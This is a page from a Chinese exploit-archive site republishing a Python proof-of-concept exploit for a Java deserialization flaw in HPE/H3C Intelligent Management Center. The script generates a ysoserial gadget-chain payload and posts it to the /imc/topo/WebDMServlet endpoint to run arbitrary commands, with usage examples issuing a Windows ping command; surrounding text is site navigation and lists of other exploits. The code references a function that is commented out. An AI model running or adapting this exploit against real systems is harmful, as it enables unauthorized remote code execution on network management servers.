首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HPE < 7.2 - Java Deserialization
来源:vfocus.net 作者:Kuhn 发布时间:2017-09-20  
#!/usr/bin/env python ######################################################################################################## # # HPE/H3C IMC - Java Deserialization Exploit # # Version 0.1 # Tested on Windows Server 2008 R2 # Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91 # # Author: # Raphael Kuhn (Daimler TSS) # # Special thanks to: # Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon # ####################################################################################################### import requests import sys import os import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) host = "127.0.0.1:8080" payload_file = "payload.bin" body = "" def printUsage () : print "......................................................................................................................" print "." print ". HPE/H3C - IMC Java Deserialization Exploit" print "." print ". Example 1: -payload-binary" print ". [-] Usage: %s http[s]://: -payload-binary payload" % sys.argv[0] print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) " print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin" print ". 2. Send request to server" print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] print "." print ". Example 2: -payload-string" print '. [-] Usage: %s http[s]://: -payload-string "payload"' % sys.argv[0] print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)" print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] print "." print "......................................................................................................................" def loadPayloadFile (_fileName) : print "[+] Load payload file %s" % _fileName payloadFile = open(_fileName, 'rb') payloadFile_read = payloadFile.read() return payloadFile_read def exploit (_payload) : url = sys.argv[1] url += "/imc/topo/WebDMServlet" print "[+] Sending exploit to %s" % (url) data = _payload response = requests.post(url, data=data, verify=False) return response #def showResponse(_response): # r = response # m = r.search(_response) # if (m.find("java.lang.NullPointerException")): # print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)" # else: # print "[-] ClassCastException not found, exploit failed" if __name__ == "__main__": if len(sys.argv) < 4: printUsage() sys.exit(0) else: print "------------------------------------------" print "- HPE/H3C - IMC Java Deserialization Exploit -" print "------------------------------------------" host = sys.argv[1] print "[*] Connecting to %s" %host if sys.argv[2] == "-payload-binary": payload_file = sys.argv[3] if os.path.isfile(payload_file): payload = loadPayloadFile(payload_file) response = exploit(payload) showResponse(response.content) else: print "[-] Can't load payload file" elif sys.argv[2] == "-payload-string": if os.path.isfile("ysoserial.jar"): sPayload = sys.argv[3] sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin" print "[+] Create payload file (%s) " %sPayload os.system(sPayload) payload = loadPayloadFile(payload_file) response = exploit(payload) print "[+] Response received, exploit finished." else: print "[-] Can't load ysoserial.jar" else: printUsage()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache - HTTP OPTIONS Memory L
·Microsoft Edge 38.14393.1066.0
·Microsoft Windows Kernel - 'wi
·Disk Pulse Enterprise 9.9.16 G
·Microsoft Windows Kernel - 'wi
·Linux Kernel <= 4.13.1 - BlueT
·Microsoft Windows Kernel - 'wi
·Microsoft Edge - Chakra Incorr
·Microsoft Windows Kernel - 'wi
·Microsoft Edge Chakra - Deferr
·Microsoft Windows Kernel - 'nt
·Microsoft Edge Chakra - 'Parse
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved